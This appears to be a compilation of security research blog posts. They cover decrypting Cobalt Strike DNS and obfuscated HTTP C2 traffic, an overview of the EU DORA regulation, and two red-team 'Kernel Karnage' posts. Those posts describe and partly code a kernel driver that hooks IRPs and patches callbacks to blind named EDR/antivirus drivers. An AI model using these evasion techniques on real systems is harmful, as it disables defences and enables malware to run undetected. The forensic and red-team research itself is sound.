Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is introduced to avoid that cached DNS results can interfere in the communication. This is done by making each name in the DNS queries unique. This is done with an extra hexadecimal label.

Notice that there is an hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. That hexadecimal label consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter always starts with 0 and increments with 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive in disorder.

Thus, when all the DNS TXT replies have been received (there is only one in our example), the base 64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records (0.0.0.240 reply), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is 8.8.4.116, XORed with 8.8.4.4, this gives 0.0.0.112. Thus 112 bytes of encrypted data have to be received.: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, is uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each name of a DNS query for a DNS_output query, has a unique hexadecimal counter, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted, is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]thedarkestside.org.

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.]thedarkestside.org: domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes long.

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.

The hexadecimal data above, is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output) and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (size of the encrypted data). That size field is not present in the format of the DNS_output data.

Decryption

We have developed a tool, cs-parse-traffic, that can decrypt and parse DNS traffic and HTTP(S). Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

Option -f dns is required to process DNS traffic, and option -i 8.8.4.4. is used to provided the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

That key can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic

Conclusion

The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic, is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

The digital operational resilience act (DORA): what you need to know about it, the requirements and challenges we see.

23 November 2021 at 15:02

TL;DR – In this blogpost, we will give you an introduction to DORA, as well as how you can prepare yourself to be ready for it.

More specifically, throughout this blogpost we will try to formulate an answer to following questions:

  • What is DORA and what are the key requirements of DORA?
  • What are the biggest challenges that you might face in becoming “DORA compliant”?

This blog post is part of a series, keep an eye out for the following parts! In the following blogposts, we will further explore the requirements of DORA, as well as elaborate a self-assessment checklist for financial entities to start assessing their compliance.

What is DORA?

DORA stands for Digital Operational Resilience Act. DORA is the EU proposal to tackle digital risks and build operational resilience in the financial sector. 

The idea of DORA is that organizations are able to demonstrate that they can resist, respond and recover from the impacts of ICT incidents, while continuing to deliver critical functions and minimizing disruption for customers and for the financial system as a whole.

With the DORA, the EU aims to make sure financial organisations mitigate the risks arising from increasing reliance on ICT systems and third parties for critical operations. The risks will be mitigates through appropriate Risk Management, Incident Management, Digital Operational Resilience Testing, as well as Third-Party Risk Management.

Who is concerned?

DORA applies to financial entities, from banks i.e. credit institutions to investment & payment institutions,  electronic money institutions, pension, audit firms, credit rating agencies, insurance and reinsurance undertakings and intermediaries.

Beyond that it also applies to providers of digital and data services, including providers of cloud computing services, data analytics, & data centres.

Note that, while the scope of the DORA itself is proposed to encompass nearly the entire financial system, at the same time it allows for a proportionate application of requirements for financial entities that are micro enterprises.

Exploring DORA

What is operational resilience? Digital operational resilience is the ability to build, assure and review the technological operational integrity of an organisation. In a nutshell, operational resilience a way of thinking and working that emphasizes the hardening of systems so that when an organization is attacked, it has the means to respond, recover, learn, and adapt.

Organizations that do not adopt this mindset are likely to experience DORA as an almost impossibly long checklist of disconnected requirements. We will cover the requirements in the coming blogposts.

DORA introduces requirements across five pillars: 

  • ICT Risk Management
  • ICT-related Incidents Management, Classification and Reporting
  • Digital Operational Resilience Testing
  • ICT Third-Party Risk Management
  • Information and Intelligence Sharing

We have summarised the requirements and these key challenges to start addressing now for each of the 5 pillars. 

ICT Risk Management

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

What is required?

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus the DORA does not impose specific standardization itself.

What do we consider as potential challenges for most organizations?

As described in DORA, the structure does not significantly deviate from standard Information security risk management as defined in NIST Cyber Security Framework.

However, we foresee some elements that might rise additional complexity:

First, as we reviewed, the ICT risk management requirements are organised around:

  • Identifying business functions and the information assets supporting these.
  • Protecting and preventing these assets.
  • Detecting anomalous activities.
  • Developing response and recovery strategies and plans, including communication to customers and stakeholders.

We foresee several elements that might rise additional complexity:

1. Nowadays, we see many organizations struggling with adequate asset management. A first complexity might emerge from the fact the ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. This framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

2. Protection and Prevention is also a challenge for most organizations. Based on the risk assessment, financial entities shall set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT  security  strategies, policies,  procedures and appropriate technologies to ensure the continuous monitoring and control of ICT systems and tools.

3. Most organizations also struggle with timely or prompt detection of anomalous activities. Some complexity might arise as financial entities shall have to ensure the prompt detection of anomalous activities, enforce multiple layers of control, as well as enable the identification of single points of failure.

4. However, while the first three of these will be fairly familiar to most firms, although implemented with various degrees of maturity, the latter (response and recovery) should focus minds. This will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

5. On top of this, as part as the “Learning and Evolving” part of DORA’s Risk Management Framework, DORA not only introduces compulsory training on digital operational resilience for the management body but also for the whole staff, as part of their general training package. Getting all staff on-board might create additional complexity.

In a coming blogpost, we will be reviewing the requirements associated with the risk-based approach based on the ICT risk management framework of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT-related Incidents Management, Classification and Reporting

DORA has its core in a strong evaluation and reporting process. This process is reflected in Chapter 3 of the regulation.

What is required?

What is required?

In the regulation, ICT-related incident reporting obliges financial entities to establish and implement a management process to monitor and log ICT-related incidents and to classify them based on specific criteria.

The ICT-related Incident Management requirements are organised around:

  • Implementation of an ICT-related incident management process
  • Classification of ICT-related incidents
  • Reporting of major ICT-related incidents

What do we consider as potential challenges for most organizations?

We foresee two elements that might rise additional complexity:

1. First, financial entities will need to review their incident classification methodology to fit with the requirements of the regulation. To help organisations prepare, we anticipate that the incident classification methodology will align with the ENISA Reference Incident Classification Taxonomy.  Indeed, this framework is referenced in the footnote of DORA. Other standards might be permissible, provided they meet the conditions set out in the Regulation but, when a standard or framework is especially called out, there is no downside to considering it.

2. Second, financial entities will also need to set up the right processes and channels to be able to notify the regulator fast in case a major incident occurs. Although firms will only need to report major incidents to their national regulator, this will need to be within strict deadlines. Moreover, based on what gets classified as “major”, this might happen frequently. 

In a coming blogpost, we will be reviewing the requirements associated with the ICT-related Incidents Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Digital Operational Resilience Testing

DORA introduces the testing efficiency of the risk management framework and measures in place to respond to and recover from a wide range of ICT incident scenarios. This process is reflected in Chapter 4 of the regulation.

What is required?

The underlying rationale behind this part of the regulation would be that undetected vulnerabilities in financial entities could threaten the stability of the financial sector. In order to mitigate this risk, DORA introduces a comprehensive testing program with the aim to identify and explore possible ways in which financial entities could be compromised.

Digital operational resilience testing serves for the periodic testing of the ICT risk management framework for preparedness and identification of weaknesses, deficiencies or gaps, as well as the prompt adoption of corrective measures.

DORA also strongly recommends advanced testing of ICT tools, systems and processes based on threat led penetration testing (“TLPT”), carried out at least every 3 years. The technical standards to apply, when conducting intelligence-based penetration testing, are likely to be aligned with the TIBER-EU developed by the ECB.

The Digital Operational Resilience Testing requirements are therefore organised around:

  • Basic Testing of ICT tools and systems – Applicable to all financial entities
  • Advanced Testing of ICT tools, systems and processes (“TLPT”) – Only applicable to  financial entities identified as significant by competent authorities

What do we consider as potential challenges for most organizations?

We foresee two elements that might rise additional complexity:

1. First, from a cultural standpoint, a challenge might be that financial entities see or perceive Operational Resilience testing as BCP or DR testing. A caution has to be raised here as the objective of DORA with this requirements focuses more on penetration testing than the traditional Operational Resilience testing.

From another cultural standpoint, resilience testing programs should not be perceived as a single goal. It should not be perceive as a binary value concept (either it is in place or not). As stated, the underlying behind DORA is rather about identifying weaknesses, deficiencies or gaps, and admitting that a breach might happen or a vulnerability could go undetected. DORA is therefore more about preparing to withstand just such a possibility.

2. Second, as stated, significant financial entities (might be firms already in the scope of NIS regulation) will have to implement a threat-led penetration testing program and exercise. It is likely that this first exercise will have to be organized by the end of 2024. This might seem like a sufficient period to time for these tests to be conducted, however, consider that these types of tests will require a lot of preparation. First, all EU-based critical ICT third parties are required to be involved. This means that all of these third-parties should also be involved in the preparation of this exercise, which will require a lot of coordination and planning beforehand. Second, the scenario for these threat-led penetration testing exercises will have to be agreed by the regulator in advance. Significant financial entities should therefore start thinking about the scenario as soon as possible to enable validation with the regulator at least 2 years before the deadline.  

In a coming blogpost, we will be reviewing the requirements associated with the Resilience Testing of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT Third-Party Risk Management

DORA introduces the governance of third-party service providers and the management of third-party risks. DORA states that financial entities should have appropriate level of controls and monitoring of their ICT third parties. This process is reflected in Chapter 5 of the regulation.

What is required?

Chapter 5 addresses the key principles for a sound management of ICT Third-Party risks. In a nutshell, the main requirements associated with these key principles could be described as the following:

  • Obligatory Contractual Provisions :
    • DORA introduces obligatory provisions that have to be present in any contract concluded between a financial institution and an ICT third-party provider.
  • ICT third-party risk strategy definition :
    • Firm shall define a multi-vendor ICT third-party risk strategy and policy owned by a member of the management body.
  • Maintenance of a Register of Information :
    • Firms shall define and maintain a register of information that contains the full view of all their ICT third-party providers, the services they provide and the functions they underpin according to the key contractual provisions.
  • Perform due diligence/assessments :
    • Firms shall assess ICT service providers according to certain criteria before entering into a contractual arrangement on the use of ICT services (e.g. security level, concentration risk, sub-outsourcing risks).

What do we consider as potential challenges for most organizations?

We foresee several elements that might rise additional complexity:

1. One of the main challenges that we foresee relates to the assembling and maintenance of the Register of Information. Financial entities will have to collect information on all ICT vendors (not only the most critical).  

This might create additional complexity as DORA states that this register shall be maintained at entity level and, at sub-consolidated and consolidated levels. DORA also states that this register shall include all contractual arrangements on the use of ICT services provided, identifying the services the third-party provided and the functions they underpin. 

This requirement could be considered as a challenge, on one hand, for large financial entities that rely on thousands of big and small providers, as well as on the other hand, for smaller, less mature financial institutions that will have to ensure that that register of information is complete and accurate.

Some other challenges also have to be foreseen.

2. Contracts with all ICT providers will probably need to be amended. For “EBA” critical contracts this will be covered through the EBA directive on this, however for others (if all ICT providers are affected) this will not be the case yet. Identifying those, and upgrading their contracts will be a challenge.

3. Regarding the Exit strategy, and following the same reasoning, for “EBA” critical contracts this will be covered through the EBA directive on this, however for others this might not be the case yet. Determining how to enforce this requirement in these contract will also have to be seen as creating additional complexity.

4. Determining a correct risk-based approach for performing assessments on the ICT providers will possibly add additional complexity as well. Performing assessments on all ICT providers is not feasible. ICT providers will have to be prioritized based on criticality criteria that will have to be defined.

In a coming blogpost, we will be reviewing the requirements associated with the ICT Third-Party Risk Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Information and Intelligence Sharing

DORA promotes information-sharing arrangements on cyber threat information and intelligence. This process is reflected in Chapter 6 of the regulation.

What is required?

DORA introduces guidelines on setting up information sharing arrangements between firms to exchange among themselves cyber threat information and intelligence on tactics, techniques, procedures, alerts and configuration tools in a trusted environment.

What do we consider as potential challenges for most organizations?

While, many organisations already have such agreements in place, such challenges might still emerge as: 

  • How will you determine what information to share? There should be a balance between helping the community and ensuring alignment with laws and regulations, as well as not sharing sensitive information with competition
  • How will you share this information efficiently?
  • What processes will you set up to consume the shared information by other entities?

Preparing yourself

In order to be ready, we recommend organisations take the following steps in 2021 and 2022:

  • Conduct a maturity assessment against the DORA requirements and define a mitigation plan to reach compliance.
  • Start consolidating the register of information for all ICT third-party providers.
  • Start defining a potential scenario for the large-scale penetration test.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering. 

Find out more about Nicolas on Linkedin.

Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

19 November 2021 at 15:18

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking the EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques as well as a method to load itself into kernel memory, bypassing Driver Signing Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for, how it works and avoid copy pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their working and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current function notifies a call was intercepted via a debug message and then call the original completion routine. I’m currently working on a method to inspect and modify the IRPs before passing them to their completion routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateprocessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.

References

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting Obfuscated Traffic – Part 4

17 November 2021 at 08:42

Encrypted Cobalt Strike C2 traffic can be obfuscated with malleable C2 data transforms. We show how to deobfuscate such traffic.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. And in part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

In the first 3 parts of this series, we have always looked at traffic that contains the unaltered, encrypted data: the data returned for a query and the data posted, was just the encrypted data.

This encrypted data can be transformed into traffic that looks more benign, using malleable C2 data transforms. In the example we will look at in this blog post, the encrypted data is hidden inside JavaScript code.

But how do we know if a beacon is using such instructions to obfuscate traffic, or not? This can be seen in the analysis results of the latest version of tool 1768.py. Let’s take a look at the configuration of the beacon we started with in part 1:

Figure 1: beacon with default malleable C2 instructions

We see for field 0x000b (malleable C2 instructions) that there is just one instruction: Print. This is the default, and it means that the encrypted data is received as-is by the beacon: it does not need any transformation prior to decryption.

And for field 0x000d (http post header), we see that the Build Output is also just one instruction: Print. This is the default, and it means that the encrypted data is transmitted as-is by the beacon: it does not need any transformation after encryption.

Let’s take a look at a sample with custom malleable C2 data transforms:

Figure 2: beacon with custom malleable C2 instructions

Here we see more than just a Print instruction: “Remove 1522 bytes from end”, “Remove 84 bytes from begin”, …

These are instructions to transform (deobfuscate) the incoming traffic, so that it can then be decrypted. To understand in detail how this works, we will do the transformation manually with CyberChef. However, do know that tool cs-parse-http-traffic.py can do these transformations automatically.

This is the network capture for a single GET request by the beacon and reply from the team server (C2):

Figure 3: reply transformed with malleable C2 instructions to look like JavaScript code

What we see here, is a GET request by the beacon to the C2 (notice the Cookie with the encrypted metadata) and the reply by the C2. This reply looks like JavaScript code, because of the malleable C2 data transforms that have been used to make it look like JavaScript code.

We copy this reply over to CyberChef in its input field:

Figure 4: CyberChef with obfuscated input

The instructions we need to follow, to deobfuscate this reply, are listed in tool 1768.py’s output:

Figure 5: decoding instructions

So let’s get started. First we need to remove 1522 bytes from the end of the reply. This can be done with a CyberChef drop bytes function and a negative length (negative length means dropping from the end):

Figure 6: dropping 1522 bytes from the end

Then, we need to remove 84 bytes from the beginning of the reply:

Figure 7: dropping 84 bytes from the beginning

And then also dropping 3931 bytes from the beginning:

Figure 8: dropping 3931 bytes from the beginning

And now we end up with output that looks like BASE64 encoded data. Indeed, the next instruction is to apply a BASE64 decoding instructions (to be precise: BASE64 encoding for URLs):

Figure 9: decoding BASE64/URL data

The next instruction is to XOR the data. To do that we need the XOR key. The malleable C2 instruction to XOR, uses a 4-byte long random key, that is prepended to the XORed data. So to recover this key, we convert the binary output to hexadecimal:

Figure 10: hexadecimal representation of the transformed data

The first 4 bytes are the XOR key: b7 85 71 17

We use that with CyberChef’s XOR command:

Figure 11: XORed data

Notice that the first 4 bytes are NULL bytes now: that is as expected, XORing bytes with themselves gives NULL bytes.

And finally, we drop these 4 NULL bytes:

Figure 12: fully transformed data

What we end up with, is the encrypted data that contains the C2 commands to be executed by the beacon. This is the result of deobfuscating the data by following the malleable C2 data transform. Now we can proceed with the decryption using a process memory dump, just like we did in part 3.

Figure 13: extracting the cryptographic keys from process memory

Tool cs-extract-key.py is used to extract the AES and HMAC key from process memory: it fails, it is not able to find the keys in process memory.

One possible explanation that the keys can not be found, is that process memory is encoded. Cobalt Strike supports a feature for beacons, called a sleep mask. When this feature is enabled, the process memory with data of a beacon (including the keys) is XOR-encoded while a beacon sleeps. Thus only when a beacon is active (communicating or executing commands) will its data be in cleartext.

We can try to decode this process memory dump. Tool cs-analyze-processdump.py is a tool that tries to decode a process memory dump of a beacon that has an active sleep mask feature. Let’s run it on our process memory dump:

Figure 14: analyzing the process memory dump (screenshot 1)
Figure 15: analyzing the process memory dump (screenshot 2)

The tool has indeed found a 13-byte long XOR key, and written the decoded section to disk as a file with extension .bin.

This file can now be used with cs-extract-key.py, it’s exactly the same command as before, but with the decoded section in stead of the encoded .dmp file:

Figure 16: extracting keys from the decoded section

And now we have recovered the cryptographic keys.

Notice that in figure 16, the tool reports finding string sha256\x00, while in the first command (figure 13), this string is not found. The absence of this string is often a good indicator that the beacon uses a sleep mask, and that tool cs-analyze-processdump.py should be used prior to extracting the keys.

Now that we have the keys, we can decrypt the network traffic with tool cs-parse-http-traffic.py:

Figure 17: decrypting the traffic fails

This fails: the reason is the malleable C2 data transform. Tool cs-parse-http-traffic.py needs to know which instructions to apply to deobfuscate the traffic prior to decryption. Just like we did manually with CyberChef, tool cs-parse-http-traffic.py needs to do this automatically. This can be done with option -t.

Notice that the output of tool 1768.py contains a short-hand notation of the instructions to execute (between square brackets):

Figure 18: short-hand notations of malleable C2 instructions

For the tasks to be executed (input), it is:

7:Input,4,1:1522,2:84,2:3931,13,15

And for the results to be posted (output), it is:

7:Output,15,13,4

These instructions can be put together (using a semicolon as separator) and fed via option -t to tool cs-parse-http-traffic.py:

Figure 19: decrypted traffic

And now we finally obtain decrypted traffic. There are no actual commands here in this traffic, just “data jitter”: that is random data of random length, designed to even more obfuscate traffic.

Conclusion

We saw how malleable C2 data transforms are used to obfuscate network traffic, and how we can deobfuscate this network traffic by following the instructions.

We did this manually with CyberChef, but that is of course not practical (we did this to illustrate the concept). To obtain the decoded, encrypted commands, we can also use cs-parse-http-traffic.py. Just like we did in part 3, where we started with an unknown key, we do this here too. The only difference, is that we also need to provide the decoding instructions:

Figure 20: extracting and decoding the encrypted data

And then we can take one of these 3 encrypted data, to recover the keys.

Thus the procedure is exactly the same as explained in part 3, except that option -t must be used to include the malleable C2 data transforms.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 3 (Challenge Accepted)

16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

